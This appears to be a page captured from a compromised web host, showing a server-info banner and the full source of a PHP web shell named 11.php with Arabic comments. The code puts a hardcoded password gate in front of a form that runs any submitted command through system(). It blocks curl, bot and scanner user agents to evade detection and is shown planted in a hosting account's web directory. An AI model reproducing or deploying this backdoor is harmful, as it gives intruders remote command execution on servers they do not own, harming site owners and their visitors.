HEX
Server: Apache
System: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User: u103727277 (3416564)
PHP: 8.0.30
Disabled: NONE
$ pwd: /homepages/4/d860090557/htdocs/clickandbuilds/
Upload Files
File: /homepages/4/d860090557/htdocs/clickandbuilds/11.php
<?php
session_start();

/* -------------------------------
    إعدادات
--------------------------------*/

// هاش كلمة المرور (كلمة المرور: 580)
$hashed_pass = password_hash("580", PASSWORD_DEFAULT);

// تفعيل قفل IP (اختياري)
$allowed_ip = ""; // غيّرها إلى IP الخاص بك

// إذا تريد إيقاف قفل IP، خلّيها فاضية:
// $allowed_ip = "";

/* -------------------------------
    حماية من البوتات
--------------------------------*/
$user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
$blocked_agents = ["curl", "bot", "spider", "crawler", "scan"];

foreach ($blocked_agents as $agent) {
    if (strpos($user_agent, $agent) !== false) {
        die("Access Denied");
    }
}

/* -------------------------------
    قفل الـ IP
--------------------------------*/
if (!empty($allowed_ip) && $_SERVER['REMOTE_ADDR'] !== $allowed_ip) {
    die("Access Denied (IP Locked)");
}

/* -------------------------------
    تسجيل الدخول
--------------------------------*/
if (!isset($_SESSION['auth'])) {

    if (isset($_POST['password'])) {

        if (password_verify($_POST['password'], $hashed_pass)) {
            $_SESSION['auth'] = true;
        } else {
            $error = "❌ الرمز غير صحيح";
        }
    }

    if (!isset($_SESSION['auth'])) {
        ?>
        <!DOCTYPE html>
        <html>
        <head>
            <meta charset="UTF-8">
            <title>Login</title>
            <style>
                body {
                    background: #121212;
                    color: #fff;
                    font-family: Arial;
                    text-align: center;
                    margin-top: 100px;
                }
                input {
                    padding: 10px;
                    border-radius: 8px;
                    border: none;
                    margin: 5px;
                }
                .btn {
                    background: #1e88e5;
                    color: white;
                    cursor: pointer;
                }
                .error {
                    color: #ff5252;
                    margin-top: 10px;
                }
            </style>
        </head>
        <body>

        <h2>🔒 Shell Login</h2>

        <form method="POST">
            <input type="password" name="password" placeholder="ادخل الرمز">
            <input class="btn" type="submit" value="دخول">
        </form>

        <?php
        if (isset($error)) {
            echo "<p class='error'>$error</p>";
        }
        ?>

        </body>
        </html>
        <?php
        exit;
    }
}

?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Shell</title>
    <style>
        body {
            background: #0d0d0d;
            color: #00e676;
            font-family: Consolas, monospace;
            padding: 20px;
        }
        input {
            background: #1b1b1b;
            color: #fff;
            padding: 10px;
            width: 80%;
            border-radius: 6px;
            border: 1px solid #333;
        }
        .btn {
            background: #00e676;
            color: #000;
            border: none;
            padding: 10px 20px;
            border-radius: 6px;
            cursor: pointer;
            font-weight: bold;
        }
        pre {
            background: #000;
            color: #76ff03;
            padding: 20px;
            margin-top: 20px;
            border-radius: 10px;
            overflow-x: auto;
        }
    </style>
</head>
<body>

<h2>💻 Secure Shell</h2>

<form method="GET">
    <input type="text" name="cmd" placeholder="اكتب الأمر هنا..." autofocus>
    <input class="btn" type="submit" value="Execute">
</form>

<pre>
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd'] . " 2>&1");
}
?>
</pre>

</body>
</html>
@ Telegram